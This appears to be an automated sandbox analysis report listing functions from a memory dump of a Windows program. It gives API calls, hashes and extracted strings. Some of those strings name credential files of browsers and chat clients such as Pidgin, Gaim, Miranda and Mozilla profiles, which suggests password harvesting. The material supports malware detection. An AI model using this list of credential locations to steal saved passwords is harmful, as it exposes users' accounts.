                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ClassName_strcmpimemset
                                                                                                    • String ID: edit
                                                                                                    • API String ID: 275601554-2167791130
                                                                                                    • Opcode ID: 1fc934d62d77a70a9e396aa4a7c9eacbfe567db38c0b85652fff254433e2e45d
                                                                                                    • Instruction ID: aca7036e1f85a757735cd09c7bf6aa39e2ce89dfda263754777898d954571a1f
                                                                                                    • Opcode Fuzzy Hash: 1fc934d62d77a70a9e396aa4a7c9eacbfe567db38c0b85652fff254433e2e45d
                                                                                                    • Instruction Fuzzy Hash: 61E09BB3C5012A6ADB11AA64EC05FE5376C9F54705F0001F6B949E2081E5B457C44B94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00401085, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406A19: memset.MSVCRT ref: 00406A23
                                                                                                      • Part of subcall function 00406A19: _mbscpy.MSVCRT ref: 00406A63
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 004010AA
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004010BA
                                                                                                    • SendMessageA.USER32(00000000,00000030,?,00000000), ref: 004010C7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: CreateFontIndirectItemMessageSend_mbscpymemset
                                                                                                    • String ID: MS Sans Serif
                                                                                                    • API String ID: 2650341901-168460110
                                                                                                    • Opcode ID: e4ca45643e333f1720333046815af32c43876757aaae09a92ca8bc646b2ccae1
                                                                                                    • Instruction ID: 5c9505941c48c8dd7a2399cb1aaf590a0077e647136f214fd0fe6491ebdd60b9
                                                                                                    • Opcode Fuzzy Hash: e4ca45643e333f1720333046815af32c43876757aaae09a92ca8bc646b2ccae1
                                                                                                    • Instruction Fuzzy Hash: 67E06D71A40604FBCB116BA0EC0AFCABB6CAB44700F108125FA51B60E1D7B0A114CB88
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00412192, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(shell32.dll,00412251,00000000,00000104), ref: 004121A0
                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004121B5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                    • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                    • API String ID: 2574300362-543337301
                                                                                                    • Opcode ID: 65bafe7a062dc340e9a6b521779d20cd872f84261b23a2d66ef8095fb01f6124
                                                                                                    • Instruction ID: a03a44e40ad870f41b9c2d8f2e6b277420dcc77a40eb9148cfb32e265f33a348
                                                                                                    • Opcode Fuzzy Hash: 65bafe7a062dc340e9a6b521779d20cd872f84261b23a2d66ef8095fb01f6124
                                                                                                    • Instruction Fuzzy Hash: 2ED0C978A00302EBEB20DF61BD597D63FA8A74C711F20C036F905D2262DBB865D0CA2C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00412D65, Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1860491036-0
                                                                                                    • Opcode ID: 39eec9e8f364713fb9ebedea39b78bb371c8d5d8ce807c4bf4127dc0ebf7dabd
                                                                                                    • Instruction ID: 077d2ad6405c458e4821e20ddf5ab0b81a66c3d9f88b424bd3f36c9f492752c9
                                                                                                    • Opcode Fuzzy Hash: 39eec9e8f364713fb9ebedea39b78bb371c8d5d8ce807c4bf4127dc0ebf7dabd
                                                                                                    • Instruction Fuzzy Hash: F0310AB4A007008FDB609F2AD945692FBF4FF84305F25886FD549CB262D7B8D491CB19
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004116A9, Relevance: 6.3, APIs: 5, Instructions: 51stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpistrchr$_mbscpymemsetstrrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 274398480-0
                                                                                                    • Opcode ID: 8152aa6171c4159ef6465b31656666253e18c95892931f65106702393bd21b79
                                                                                                    • Instruction ID: 328b4c9133cd54f2635944cbca80cb08cea31e8af7c0159c33255436c65d5f23
                                                                                                    • Opcode Fuzzy Hash: 8152aa6171c4159ef6465b31656666253e18c95892931f65106702393bd21b79
                                                                                                    • Instruction Fuzzy Hash: C601D6756082087AEB20BB72DC03FCB3B9C8F1175AF10005FF689A50D1EEA8D6C146AD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040C9C7, Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memset$memcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 368790112-0
                                                                                                    • Opcode ID: db955d66aa391fc484fd506110ad959e30d2163aa55218731a18cbda7d247bce
                                                                                                    • Instruction ID: 72ff1d110960cc82dd2bfc388b685e2dd0a1937d99bf851f24f672c8116534dd
                                                                                                    • Opcode Fuzzy Hash: db955d66aa391fc484fd506110ad959e30d2163aa55218731a18cbda7d247bce
                                                                                                    • Instruction Fuzzy Hash: 4C0128B1740B00B6D231EF29DC43F6A7BA49F91B18F100B1EF1526A6C1E7B8B244865D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040AE7D, Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040972B: ??2@YAPAXI@Z.MSVCRT ref: 0040974C
                                                                                                      • Part of subcall function 0040972B: ??3@YAXPAX@Z.MSVCRT ref: 00409813
                                                                                                    • strlen.MSVCRT ref: 0040AEA3
                                                                                                    • atoi.MSVCRT ref: 0040AEB1
                                                                                                    • _mbsicmp.MSVCRT ref: 0040AF04
                                                                                                    • _mbsicmp.MSVCRT ref: 0040AF17
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 4107816708-0
                                                                                                    • Opcode ID: 3a59e25db7847bfcb7a2cf7fa4c60edbf2d33e4cde8c95d2bbbe957afd87409f
                                                                                                    • Instruction ID: 08bf478f3eb11018bf028c01ffb7f168253fa3ae9792e106a9a4f60ade7b3b20
                                                                                                    • Opcode Fuzzy Hash: 3a59e25db7847bfcb7a2cf7fa4c60edbf2d33e4cde8c95d2bbbe957afd87409f
                                                                                                    • Instruction Fuzzy Hash: B8414975900305EFCB11DF69D580A9ABBF4FB48308F1084BAEC15AB392D778DA51CB59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00413646, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: strlen
                                                                                                    • String ID: >$>$>
                                                                                                    • API String ID: 39653677-3911187716
                                                                                                    • Opcode ID: fe18d8dd2c8264a7d2d3ac72613768907538146584e0663d827c53e1f55572e9
                                                                                                    • Instruction ID: dc7a302430b06bbc29ce8331a0d654e54ba56492e0c60a2da2e35593be10561b
                                                                                                    • Opcode Fuzzy Hash: fe18d8dd2c8264a7d2d3ac72613768907538146584e0663d827c53e1f55572e9
                                                                                                    • Instruction Fuzzy Hash: 7B31FBA580D2C4AED7219F6880557EEFFA14F22305F1886DAC0D447383C22C9BCAD75A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040EA56, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 72stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040EA89
                                                                                                    • strlen.MSVCRT ref: 0040EA8F
                                                                                                    • strlen.MSVCRT ref: 0040EA9C
                                                                                                      • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                                                                                      • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: strlen$_mbscat_mbscpymemset
                                                                                                    • String ID: accounts.xml
                                                                                                    • API String ID: 581844971-666780623
                                                                                                    • Opcode ID: 3b236e653348da5417edaa74ab4b2c2d6336b1da36662295ef381eeb4047c0c7
                                                                                                    • Instruction ID: 3a6749a91d87314aa81efbea2023e77c1fe97455d9ba7aea10baf3c7dddfb932
                                                                                                    • Opcode Fuzzy Hash: 3b236e653348da5417edaa74ab4b2c2d6336b1da36662295ef381eeb4047c0c7
                                                                                                    • Instruction Fuzzy Hash: 9C210471A041186BCB10EB66DC416DFB7F8AF55314F0484BBE009E7142DBB8EA958FE8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040EB3D, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 72stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040EB70
                                                                                                    • strlen.MSVCRT ref: 0040EB76
                                                                                                    • strlen.MSVCRT ref: 0040EB83
                                                                                                      • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                                                                                      • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: strlen$_mbscat_mbscpymemset
                                                                                                    • String ID: accounts.xml
                                                                                                    • API String ID: 581844971-666780623
                                                                                                    • Opcode ID: 525a6947399d2dc96bd98280f09e98ebf0a88ac4f7fc2c84a32f5a3fc94ac3d7
                                                                                                    • Instruction ID: f45e0dada1ac7c46e734b25b908a600237734d5f3cbc55dd7ef5ba4cf50aaebb
                                                                                                    • Opcode Fuzzy Hash: 525a6947399d2dc96bd98280f09e98ebf0a88ac4f7fc2c84a32f5a3fc94ac3d7
                                                                                                    • Instruction Fuzzy Hash: AD21F5719041185BDB11EB26DC41ACA77BC5F51314F0484BBA508E7141DBB8EAD68FD8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407364, Relevance: 6.1, APIs: 4, Instructions: 65stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • strlen.MSVCRT ref: 00407375
                                                                                                      • Part of subcall function 00406982: malloc.MSVCRT ref: 0040699E
                                                                                                      • Part of subcall function 00406982: memcpy.MSVCRT ref: 004069B6
                                                                                                      • Part of subcall function 00406982: ??3@YAXPAX@Z.MSVCRT ref: 004069BF
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00407398
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004073BB
                                                                                                    • memcpy.MSVCRT ref: 004073DB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ??3@$memcpy$mallocstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1171893557-0
                                                                                                    • Opcode ID: 132c74d0540cee128a8a0d405a2ba85f7d3cebb6f86b25cf3b6eeaee9d84ce65
                                                                                                    • Instruction ID: d47861f91907e87d10e443503ad883c0cefe0bd36095b640ea2ff485cde935f6
                                                                                                    • Opcode Fuzzy Hash: 132c74d0540cee128a8a0d405a2ba85f7d3cebb6f86b25cf3b6eeaee9d84ce65
                                                                                                    • Instruction Fuzzy Hash: 53218C71204604AFD730DF18E881996B7F5EF04324B208A2EFC6A9B6D1C735FA59CB55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407944, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1865533344-0
                                                                                                    • Opcode ID: e2cfaa68213c0131ff58227f61e715dee9609dc152932ae150db42a1ac1bab38
                                                                                                    • Instruction ID: be4f301e428eab7478e357bf13cd6827c7edeb2881237a21e1a336ab79825493
                                                                                                    • Opcode Fuzzy Hash: e2cfaa68213c0131ff58227f61e715dee9609dc152932ae150db42a1ac1bab38
                                                                                                    • Instruction Fuzzy Hash: C8116DB1608601AFE329DF19D881A26F7E5FF88300F20892EE4DA87391D635E841CB55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040E4B6, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 51stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040E4DF
                                                                                                    • strlen.MSVCRT ref: 0040E4EA
                                                                                                    • strlen.MSVCRT ref: 0040E4F8
                                                                                                      • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                                                                                      • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: strlen$_mbscat_mbscpymemset
                                                                                                    • String ID: prefs.js
                                                                                                    • API String ID: 581844971-3783873740
                                                                                                    • Opcode ID: e695a85550e18a578563b94c74fc6493014cfdadf8041b930889a3e806ae1ffc
                                                                                                    • Instruction ID: 18aa10c61fb3677f8c34c5df747d0d2d010b9cd1cf1f562783039ea2ec755a14
                                                                                                    • Opcode Fuzzy Hash: e695a85550e18a578563b94c74fc6493014cfdadf8041b930889a3e806ae1ffc
                                                                                                    • Instruction Fuzzy Hash: 9C01C87190011CBADB11EA95EC42BCABBAC9F0531DF1008BBE604E2181E7B49B948794
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040D4E9, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040D516
                                                                                                    • strlen.MSVCRT ref: 0040D52E
                                                                                                    • strlen.MSVCRT ref: 0040D53C
                                                                                                      • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                                                                                      • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: strlen$_mbscat_mbscpymemset
                                                                                                    • String ID: Mozilla\Profiles
                                                                                                    • API String ID: 581844971-2796945589
                                                                                                    • Opcode ID: 0aa7d3934af6cad62813f129be923080ce627a03e4e537c0df51ec7c1f843471
                                                                                                    • Instruction ID: 3c6ae931ffe100bc814a6c4c739c4374e257fa1fb59e82d364b3a540d615c615
                                                                                                    • Opcode Fuzzy Hash: 0aa7d3934af6cad62813f129be923080ce627a03e4e537c0df51ec7c1f843471
                                                                                                    • Instruction Fuzzy Hash: 2201F07290821466D711A6699C42FCA779C4F21759F2404BBF5C5F31C2EDB899C443A9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040D578, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040D5A5
                                                                                                    • strlen.MSVCRT ref: 0040D5BD
                                                                                                    • strlen.MSVCRT ref: 0040D5CB
                                                                                                      • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                                                                                      • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: strlen$_mbscat_mbscpymemset
                                                                                                    • String ID: .purple
                                                                                                    • API String ID: 581844971-1504268026
                                                                                                    • Opcode ID: ce90a298f9a0b1b6836f0fc3c2cbe6f8c63b7891ac98c3c51215785f47ccc7bc
                                                                                                    • Instruction ID: 5dc147b8957afa7b06b9bacfad0a4e1db4396cb0d3e541dfcccdd27de6d8d665
                                                                                                    • Opcode Fuzzy Hash: ce90a298f9a0b1b6836f0fc3c2cbe6f8c63b7891ac98c3c51215785f47ccc7bc
                                                                                                    • Instruction Fuzzy Hash: 8C0120725081146AD711A669DC42BCA779C4F21709F2404BFF5C5F71C2FEB899C543AD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040D607, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040D634
                                                                                                    • strlen.MSVCRT ref: 0040D64C
                                                                                                    • strlen.MSVCRT ref: 0040D65A
                                                                                                      • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                                                                                      • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: strlen$_mbscat_mbscpymemset
                                                                                                    • String ID: .gaim
                                                                                                    • API String ID: 581844971-3490432478
                                                                                                    • Opcode ID: 196aef10faece1b48b54fbb686ce1e199f9c9651a3e49e1973a42c60a0119f3c
                                                                                                    • Instruction ID: a115bc8fa66553d394cd4cab83c679d7ef9605289ec37c5517f9616187ac7207
                                                                                                    • Opcode Fuzzy Hash: 196aef10faece1b48b54fbb686ce1e199f9c9651a3e49e1973a42c60a0119f3c
                                                                                                    • Instruction Fuzzy Hash: 540120729082546AD721A6699C42BCB779C4F21709F2008BFF5C8F31C2EEBC5AC543A9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040D696, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040D6C3
                                                                                                    • strlen.MSVCRT ref: 0040D6DB
                                                                                                    • strlen.MSVCRT ref: 0040D6E9
                                                                                                      • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                                                                                      • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: strlen$_mbscat_mbscpymemset
                                                                                                    • String ID: Miranda
                                                                                                    • API String ID: 581844971-4004425691
                                                                                                    • Opcode ID: d240c73bfb4c10e61c074e43c2c0ed8726726acf12281953480ff3de4648c9b5
                                                                                                    • Instruction ID: c142bb7588fded06bca0c3959130fc7bc280b220a29219a6f5312b9b0058b910
                                                                                                    • Opcode Fuzzy Hash: d240c73bfb4c10e61c074e43c2c0ed8726726acf12281953480ff3de4648c9b5
                                                                                                    • Instruction Fuzzy Hash: 180120769081146AD721BA699C42BDA779C4F21709F2404BBF5C4F31C2EEB859C543BD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040623F, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 714388716-0
                                                                                                    • Opcode ID: ab229b3bd327be627bfa6a8927dcfeb4b0251fbfa2f001aa23d8bafecd458d55
                                                                                                    • Instruction ID: dce8e19ef7dbf3e453dc58d21b67a2b53133f69bc0796553bf20bccd0e5dc17f
                                                                                                    • Opcode Fuzzy Hash: ab229b3bd327be627bfa6a8927dcfeb4b0251fbfa2f001aa23d8bafecd458d55
                                                                                                    • Instruction Fuzzy Hash: 310144769002089BCB22EBA5DC85EDB77BCAF88305F0004ABF54797141EF38A7C48B54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B15B, Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
                                                                                                      • Part of subcall function 0040876F: memcpy.MSVCRT ref: 00408877
                                                                                                    • sprintf.MSVCRT ref: 0040B181
                                                                                                    • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B1E4
                                                                                                      • Part of subcall function 0040876F: _mbscpy.MSVCRT ref: 004087EA
                                                                                                      • Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808
                                                                                                    • sprintf.MSVCRT ref: 0040B1AB
                                                                                                    • _mbscat.MSVCRT ref: 0040B1BE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 203655857-0
                                                                                                    • Opcode ID: 48bcd73753a3de1088a11b84d960efb43f629dc3a258219230a3a5f3ea5ed895
                                                                                                    • Instruction ID: ecab945e31bd422c391273073b57af520698e657e98585e8788b6dab187b6cf3
                                                                                                    • Opcode Fuzzy Hash: 48bcd73753a3de1088a11b84d960efb43f629dc3a258219230a3a5f3ea5ed895
                                                                                                    • Instruction Fuzzy Hash: 0E0167B25003046AD721B775DC86FEB73AC6B04704F14046FB655B6182EA79EA848A68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00405E4A, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00405E6C
                                                                                                    • strlen.MSVCRT ref: 00405E74
                                                                                                    • strlen.MSVCRT ref: 00405E81
                                                                                                      • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                                                                                      • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: strlen$_mbscat_mbscpymemset
                                                                                                    • String ID: nss3.dll
                                                                                                    • API String ID: 581844971-2492180550
                                                                                                    • Opcode ID: dc525abc6d6edebac6bfa9b108e260368fb5f6e693cc622c55a843e41b0e11e7
                                                                                                    • Instruction ID: 0509c7bfbc4d162460136cac1117631891986418d94c1b22c83112455de3b5d3
                                                                                                    • Opcode Fuzzy Hash: dc525abc6d6edebac6bfa9b108e260368fb5f6e693cc622c55a843e41b0e11e7
                                                                                                    • Instruction Fuzzy Hash: 44F0CD7140C1186BDB10E769DC45FDA7BAC8F61719F1000B7F589E60C1DAB8ABC546A5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040A6B4, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040A6D7
                                                                                                    • memset.MSVCRT ref: 0040A6ED
                                                                                                      • Part of subcall function 00409DD6: _mbscpy.MSVCRT ref: 00409DDB
                                                                                                      • Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E
                                                                                                    • sprintf.MSVCRT ref: 0040A717
                                                                                                      • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                                                                                      • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                    • String ID: </%s>
                                                                                                    • API String ID: 3699762281-259020660
                                                                                                    • Opcode ID: ebb575c85aeda559d8ae490dab39b8bfe5ab3b1401c28d73b294ba1e58331789
                                                                                                    • Instruction ID: 76c63a3487c2ea4e5ea40729799977580a4d7530bed5194a5a383ad1b54ece87
                                                                                                    • Opcode Fuzzy Hash: ebb575c85aeda559d8ae490dab39b8bfe5ab3b1401c28d73b294ba1e58331789
                                                                                                    • Instruction Fuzzy Hash: EB01F97290012977D720A719CC46FDE7B6CAF55705F0400FAB50DF3142EA749B848BA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040783B, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 35stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00407930: FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A
                                                                                                      • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                                                                                      • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                                                                                    • strlen.MSVCRT ref: 00407862
                                                                                                    • strlen.MSVCRT ref: 0040786F
                                                                                                      • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                                                                                      • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: strlen$CloseFind_mbscat_mbscpymemcpy
                                                                                                    • String ID: *.*$B@
                                                                                                    • API String ID: 470300861-2086290067
                                                                                                    • Opcode ID: e71b7bb2728435c35afb30c195da2c5469ab4e5e2b82df99b22387a96c315497
                                                                                                    • Instruction ID: 1d68107b6d1fc83258085f2e46244374cde2cc5f318db11bb1f65da7a858b60d
                                                                                                    • Opcode Fuzzy Hash: e71b7bb2728435c35afb30c195da2c5469ab4e5e2b82df99b22387a96c315497
                                                                                                    • Instruction Fuzzy Hash: C7F0E972D082166FD200AA66984599BBB9C8F52729F11443FF808B7142D63D6D0643AF
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00411F43, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll,?,?,?,?,00411FF1), ref: 00411F53
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00411FB7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                    • String ID: ntdll.dll
